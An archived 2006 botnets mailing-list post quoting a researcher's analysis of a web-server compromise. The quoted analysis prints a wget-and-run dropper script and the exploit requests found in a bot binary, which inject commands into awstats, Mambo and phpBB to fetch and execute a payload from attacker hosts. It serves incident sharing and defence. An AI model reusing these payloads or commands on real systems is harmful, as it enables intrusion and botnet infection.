To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- This looks like more of LordNikon's handiwork.
On Fri, Mar 17, 2006 at 08:51:40AM +1300, Jamie Riden babbled thus: > This seems to be quite popular at the moment. > > Around Wed 8th March, I saw a drop using this method, described here - > http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf > > Probably not news to most of you, but I was surprised at how many > different computers were involved - 216.63.z.z ? initiator, 66.98.a.a > ? server hosting the defacing tool, 216.99.b.b ? machine we get the > first stage payload from, 217.160.c.c ? machine that we connect back > to and 219.96.d.d ? machine we get the second stage payload from. > > Anyway, this morning we're back to the usual shell script - > > #!/bin/bash > wget 209.200.224.166/foc > chmod 744 foc > ./foc > wget 209.200.224.166/iron > chmod 744 iron > ./iron > > Where 'iron' has the following strings in the binary: > > GET > %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;ec > ho| HTTP/1.1 > Host: %s > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) > /index.php?option=com_content&do_pdf=1&id=1 > GET > %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%2083.16.187. > 6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| HTTP/1.1 > Host: %s > User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) > GET > %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo| > HTTP/1.1 > > and 'foc' looks like the IRC bot. > > Note cmd.gif is the same or similar to a tool the Philippine Honeynet > project describe as > "" 'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts > that allows the attacker to send commands to the server primarily with > the intent to deface websites. " > > cheers, > Jamie -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome. _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
